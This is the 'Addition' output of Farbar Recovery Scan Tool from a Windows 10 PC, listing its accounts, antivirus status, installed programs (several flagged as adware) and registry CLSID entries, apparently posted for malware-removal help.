Addition
Content
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by REVERIEN (2016-04-06 15:16:27)
Running from C:\Users\REVERIEN\Desktop
Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Di
sabled)
DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disable
d)
Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\
Users\Guest
HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enable
d)
REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enable
d) => C:\Users\REVERIEN
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4
6}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4
6}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to un
hide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21
.0.0.197 - Adobe Systems Incorporated)
Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE Adobe Systems, Inc.)
Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Versio
n: 9.4.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1
.7.157 - Adobe Systems, Inc.)
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - )
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43F
F61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE037
66}) (Version: 4.1 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Ver
sion: 2.1.4.131 - Apple Inc.)
ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.30
35 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research
Institute, Inc.) Hidden
ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version:
10.1.2891 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Rese
arch Institute, Inc.) Hidden
Auslogics Duplicate File Finder (HKLM-x32\...\{6845255F-15CC-4DD1-94D5-D38F37011
8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Ap
ple Inc.)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner
's Dictionary) (Version: - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden
DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is
1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Dropbox) (Version
: 3.16.1 - Dropbox, Inc.)
Easy File Locker 1.5 (HKLM-x32\...\Easy File Locker) (Version: 1.5 - XOSLAB.COM)
Empress of the Deep - The Darkest Secret (x32 Version: 2.2.0.98 - WildTangent) H
idden
Everything 1.3.4.686 (x64) (HKLM\...\Everything) (Version: - )
Google Chrome (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Google Chro
me) (Version: 49.0.2623.110 - Google Inc.)
Google Drive (HKLM-x32\...\{895D0391-459F-4D45-B8DD-13F0DE70C66E}) (Version: 1.2
8.1549.1322 - Google, Inc.)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1
.5.1557 - Google)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Versio
n: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.18) (Version: 9.18 - Artifex Softwar
e Inc.)
HP Commercial Scanjet 5590 TWAIN Driver (HKLM-x32\...\HP Commercial Scanjet 5590
TWAIN Driver) (Version: - )
HP Imaging Device Functions 14.5 (HKLM\...\HP Imaging Device Functions) (Version
: 14.5 - HP)
HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.
006.003 - Hewlett-Packard)
hpg5590 (x32 Version: 140.000.000.000 - Hewlett-Packard) Hidden
HPScanjet5590Corporate11 (HKLM-x32\...\{16551913-D97B-4E8A-B751-44CBDC99CF5C}) (
Version: 2.20.0000 - HP)
IBM SPSS Statistics 20 (HKLM-x32\...\{2AF8017B-E503-408F-AACE-8A335452CAD2}) (Ve
rsion: 20.0.0.0 - IBM Corp)
iFree Skype Recorder 6.0.15 (HKLM-x32\...\iFree Skype Recorder) (Version: 6.0.15
- iFree Skype Recorder)
Intel AppUp(R) center (HKLM-x32\...\Intel AppUp(R) center 41663) (Version: 3.8.0
.41663.61 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E
4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}
) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4
A49FC}) (Version: 11.5.2.1001 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D04933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: )
Island Tribe (x32 Version: 2.2.0.98 - WildTangent) Hidden
istartpageing (HKLM-x32\...\istartpageing) (Version: 1.0.0.6 - ) <==== ATTENTION
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Ver
sion: 8.0.600.27 - Oracle Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version:
8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hi
dden
Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{653C1B5A-3287-47B1-8613-07
45D4E771C4}) (Version: 15.0.0.463 - Kaspersky Lab)
Kaspersky Internet Security (x32 Version: 15.0.0.463 - Kaspersky Lab) Hidden
KMSnano 24 (HKLM\...\KMSnano 24_is1) (Version: KMSnano 24 - )
Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EFDBBC016C6CB2}) (Version: 2.0 - Microsoft)
Macromedia Dreamweaver 8 (HKLM-x32\...\{0837A661-FEC3-48B3-876C-91E7D32048A9}) (
Version: 8.0.0.2734 - Macromedia)
Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F
}) (Version: 1.7.240 - Macromedia, Inc.)
Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malware Protection Live (HKLM-x32\...\MalwareProtectionLive) (Version: - )
Mendeley Desktop 1.13.8 (HKLM-x32\...\Mendeley Desktop) (Version: 1.13.8 - Mende
ley Ltd.)
Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2
007 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version
: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version
: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473
D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student
2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version: - )
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf
-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE
-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C70
01-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporatio
n)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D
76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporatio
n)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F
6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25
302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F
1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corpor
ation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9B
E518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corpor
ation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E
5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f
74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporatio
n)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67
548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporatio
n)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1
fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporatio
n)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft
Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Micros
oft Corporation)
MiKTeX 2.9 (HKLM\...\MiKTeX 2.9) (Version: 2.9 - MiKTeX.org)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 45.0.1 (x86 fr) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 fr)) (
Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 4
5.0.1.5918 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Vers
ion: 4.30.2100.0 - Microsoft Corporation)
MySQL Connector C++ 1.1.6 (HKLM\...\{80EE5F65-5553-47A1-B6A9-8BF3211D21A3}) (Ver
sion: 1.1.6 - Oracle and/or its affiliates)
MySQL Connector J (HKLM-x32\...\{8A9B23F6-9C1D-4DB2-8254-EAB70EF4325B}) (Version
: 5.1.36 - Oracle Corporation)
MySQL Connector Net 6.9.7 (HKLM-x32\...\{2C148B86-FF80-49A7-BA18-E4CEF6464AE6})
(Version: 6.9.7 - Oracle)
MySQL Connector/C 6.1 (HKLM\...\{ABC3A516-54E3-414B-B501-762E7FB2F9D5}) (Version
: 6.1.6 - Oracle Corporation)
MySQL Connector/ODBC 5.3 (HKLM\...\{A1991404-2634-47E1-BC45-8F3B5014B1D1}) (Vers
ion: 5.3.4 - Oracle Corporation)
MySQL Documents 5.6 (HKLM-x32\...\{4D17B5C1-7388-4647-9A24-D5FDD173D4EA}) (Versi
on: 5.6.27 - Oracle Corporation)
MySQL Examples and Samples 5.6 (HKLM-x32\...\{3E1DCC2B-8A78-4E91-B2EC-9DCFE25D41
FA}) (Version: 5.6.27 - Oracle Corporation)
MySQL For Excel 1.3.4 (HKLM-x32\...\{A0352E65-6E78-48B3-B6D6-B3208E663249}) (Ver
sion: 1.3.4 - Oracle)
MySQL Installer - Community (HKLM-x32\...\{9A6E1C77-5B57-43C5-9B96-95ABDE40AE7F}
) (Version: 1.4.11.0 - Oracle Corporation)
MySQL Notifier 1.1.6 (HKLM-x32\...\{CB76A6E9-B184-461D-A8BE-7D0D73199545}) (Vers
ion: 1.1.6 - Oracle)
MySQL Server 5.6 (HKLM\...\{861A680B-2084-444B-BE8D-89E153BEEEE3}) (Version: 5.6
.27 - Oracle Corporation)
Nero 8 (HKLM-x32\...\{9EDBB857-8028-49CD-B9C9-0B4D10CD1033}) (Version: 8.10.293
- Nero AG)
OCR Software by I.R.I.S. 14.5 (HKLM\...\HPOCR) (Version: 14.5 - HP)
Office Regenerator (HKLM-x32\...\{2E2E7A4E-9FA7-4E9D-A875-53B9F943F14E}) (Versio
n: 20.11.0003 - Abstradrome)
Office Timeline (HKLM-x32\...\{08E5CEB9-36D2-4F52-9320-1DF41686A69A}) (Version:
3.6.0 - Office Timeline)
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version:
15.0.4569.1506 - Microsoft Corporation) Hidden
PCTeX version 6.1 (HKLM-x32\...\PCTeXv6_is1) (Version: - )
PDF Annotator 5.0.0.511 (HKLM-x32\...\PDFAnnotator_is1) (Version: 5.0.0.511 - GR
AHL software design)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidd
en
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Premium Sound HD (HKLM\...\{000A208E-1050-4181-AC37-E13DA9254B73}) (Version: 1.1
2.6000 - DTS, Inc.)
Print to PDF Annotator (novaPDF OEM 7.7 printer) (HKLM\...\Print to PDF Annotato
r_is1) (Version: 7.7.400 - Softland)
PrtScr 1.5 (HKLM-x32\...\PrtScr_is1) (Version: - FireStarter)
Quantum GIS Lisboa 1.8.0 Lisboa (HKLM-x32\...\Quantum GIS Lisboa) (Version: - Q
GIS Development Team)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78
.80.95 - Apple Inc.)
RealDownloader (x32 Version: 18.1.3.103 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 18.1.3.104 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetwork
s, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks,
Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetwor
ks, Inc) Hidden
RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.3 - RealNet
works)
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (V
ersion: 3.800.800.121813 - REALTEK Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEE
D9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-9581
08FE7DBC}) (Version: 6.0.1.6794 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}
) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Versi
on: 2.00.0020 - REALTEK Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Reimage Protector (HKLM\...\Reimage Protector) (Version: - Reimage) <==== ATTEN
TION
Scan (x32 Version: 14.0.1.0 - Hewlett-Packard) Hidden
Scanjet 5590 (HKLM\...\{A64EBD98-D9FB-4014-8658-F61C0EFFB87C}) (Version: 14.5 HP)
Screencast-O-Matic v2.0 (HKLM-x32\...\Screencast-O-Matic v2.0) (Version: v2-1.8
- Screencast-O-Matic)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\..
.\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82
C1-A2F9403F2DA6}) (Version: - Microsoft)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Ver
sion: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Versi
on: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.8 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.8.102
- Skype Technologies S.A.)
SR9USB (HKLM-x32\...\{DA387CD3-3524-43BF-B744-17C9FE27734D}) (Version: 1.00.1037
7.0 - SUPERAL Semiconductor, Inc.)
Stata 13 (HKLM-x32\...\{217BE429-022D-4094-960F-0376E1CBE13E}) (Version: 13.0 StataCorp LP)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 Synaptics Incorporated)
Texmaker (HKLM-x32\...\Texmaker) (Version: - )
TeXstudio 2.9.4 (HKLM-x32\...\TeXstudio_is1) (Version: 2.9.4 - Benito van der Za
nder)
TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Versio
n: 1.00.08.6402 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version:
2.0.0.6415 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version:
1.00.6626.6410 - Toshiba Corporation)
TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version:
10.10 - TOSHIBA)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73
ECD4ACFAB5}) (Version: 2.00.973 - Toshiba Corporation)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Ver
sion: 1.8.17.640104 - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15F
DF}) (Version: 2.2.1.54043006 - Toshiba Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C
2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.2.00 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{B8C8422F-01F1-4791-B084-047AAFF9BFCC}) (Versi
on: 2.4.4 - TOSHIBA)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Ver
sion: 1.00.0015 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (V
ersion: 1.00.0002.32002 - Toshiba Corporation)
Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4
.3.3 - Toshiba Europe GmbH)
TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version:
5.1.0.21-A - Toshiba Corporation)
Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{901
50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{9F6B3627-AF9E-40A5-AAD5-349
7C4327616}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-002A-0000-1000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
VCRedistSetup (x32 Version: 1.0.0 - Nero AG) Hidden
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hid
den
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
VSee (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\VSee) (Version: 15.0
.0.1018 - VSee Lab Inc)
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version
: 1.0.3.0 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.9.7 - WildTangent) Hidde
n
Windows Driver Package - Hewlett-Packard Image (12/27/2006 8.0.0.0) (HKLM\...\A
86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - HewlettPackard)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - M
icrosoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC
9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinMend Folder Hidden 1.5.3 (HKLM-x32\...\WinMend Folder Hidden_is1) (Version:
- WinMend.com)
WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.ra
r GmbH)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)
YTD Video Downloader 5.1.0 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7})
(Version: 5.1.0 - GreenTree Applications SRL) <==== ATTENTION
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{00
5A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\REVERIEN\AppData\R
oaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{14
23F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{5C
8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71
DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\L
ocal\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78
550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{79
3EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{82
0D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.
exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3
BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC
182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0
336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1
EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8
CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{EC
D97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
